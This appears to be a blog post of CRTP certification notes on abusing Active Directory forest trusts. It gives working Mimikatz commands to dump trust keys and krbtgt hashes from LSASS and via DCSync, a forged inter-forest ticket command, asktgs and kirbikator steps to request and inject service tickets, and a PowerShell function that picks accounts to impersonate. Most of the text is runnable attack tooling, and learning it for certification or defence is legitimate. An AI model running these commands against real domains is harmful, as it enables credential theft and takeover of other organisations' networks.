CRTP (Ticket-Abuse)
Forest Trust Ticket Abuse
1. Obtain the trust key of the inter-forest trust. Both commands read it out of LSASS on a DC of the current domain, so they need Domain Admin rights there; `lsadump::trust` prints only the trust keys, while `lsadump::lsa` dumps every account's secrets (the trust account included). Note the rc4 key for the direction current domain -> target domain.

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```
2. Forge the inter-forest TGT (the referral ticket for the target domain), signed with the trust key instead of the krbtgt hash. SID filtering is enabled on forest trusts by default, so SID History (`/sids`) does not carry over: the forged user only gets whatever access has been granted to it explicitly in the target forest (see the ForeignSecurityPrincipal lookup under Extras).

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:ad.domain.local /sid:<sid> /rc4:<rc4-hash> /service:krbtgt /target:domain2.local /ticket:C:\temp\trust_forest_tkt.kirbi"'
```
3. Request a TGS for a service in the target domain using the forged referral ticket.

```powershell
.\asktgs.exe C:\temp\trust_forest_tkt.kirbi CIFS/dc.domain2.local
```
4. Inject the TGS into the current logon session and use it. asktgs names the output file after the requested SPN (`/` replaced by `.`), so the file for `CIFS/dc.domain2.local` is `CIFS.dc.domain2.local.kirbi`.

```powershell
.\kirbikator.exe lsa .\CIFS.dc.domain2.local.kirbi
ls \\dc.domain2.local\shares\
```
Extras
To dump the krbtgt hash with DCSync instead, run the command below with Domain Admin (or equivalent replication) rights in the target domain. `/domain` takes the domain name, not a DC hostname; `/all /csv` dumps every account's hash as CSV (krbtgt included), `/user:krbtgt` limits it to that one account.

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain2.local /all /csv"'
```
Get the ForeignSecurityPrincipal

```powershell
# Foreign security principals in the target domain: SIDs from other domains or
# forests that have been granted something there (group membership, ACLs)
Get-DomainObject -Domain targetDomain.local | ? {$_.objectclass -match "foreignSecurityPrincipal"}
# Apart from the well-known SIDs present by default (S-1-5-4, S-1-5-9, S-1-5-11, ...)
# we find S-1-5-21-493355955-4215530352-779396340-1104
# Resolve that SID to the object in our current domain
Get-DomainObject |? {$_.objectsid -match "S-1-5-21-493355955-4215530352-779396340-1104"}
```
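The same lookup done for every foreign security principal at once, added here as an example (not code from the original post). It generalises the two queries above: it enumerates the FSPs of the target domain, drops the well-known SIDs every domain carries, resolves the remaining SIDs to objects in the current domain, and lists which target-domain groups each one sits in. It assumes PowerView is loaded and that the FSP SIDs originate from the current domain; the function name is my own.

```powershell
# Added example (not the original post's code). Assumes PowerView is loaded.
function Get-TrustedFromPrincipal {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $TargetDomain,   # e.g. targetDomain.local
        [string] $CurrentDomain = (Get-Domain).Name
    )

    $fsps = Get-DomainObject -Domain $TargetDomain `
                -LDAPFilter '(objectClass=foreignSecurityPrincipal)' `
                -Properties objectsid, distinguishedname

    foreach ($fsp in $fsps) {
        $sid = [string]$fsp.objectsid
        # Only domain SIDs (S-1-5-21-...) point at an account somewhere else;
        # S-1-5-4, S-1-5-9, S-1-5-11 etc. are well-known and present by default.
        if ($sid -notmatch '^S-1-5-21-') { continue }

        # Resolve the SID in our own domain (PowerView accepts a SID as -Identity).
        $local = Get-DomainObject -Domain $CurrentDomain -Identity $sid `
                     -Properties samaccountname, objectclass

        # Groups in the target domain that directly contain this FSP: that is
        # what the principal can reach over the trust.
        $groups = Get-DomainGroup -Domain $TargetDomain `
                      -LDAPFilter "(member=$($fsp.distinguishedname))" |
                  Select-Object -ExpandProperty samaccountname

        [pscustomobject]@{
            Sid          = $sid
            LocalAccount = $(if ($local) { $local.samaccountname } else { "(not found in $CurrentDomain)" })
            LocalClass   = $(if ($local) { @($local.objectclass)[-1] } else { $null })
            TargetGroups = ($groups -join ', ')
        }
    }
}

# Usage:
# Get-TrustedFromPrincipal -TargetDomain targetDomain.local | Format-Table -AutoSize
```

Rows whose LocalAccount is a user or group you can already compromise are the ones worth forging a ticket for in step 2, since those are the identities the target forest has actually granted something to.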
This post is licensed under CC BY 4.0 by the author.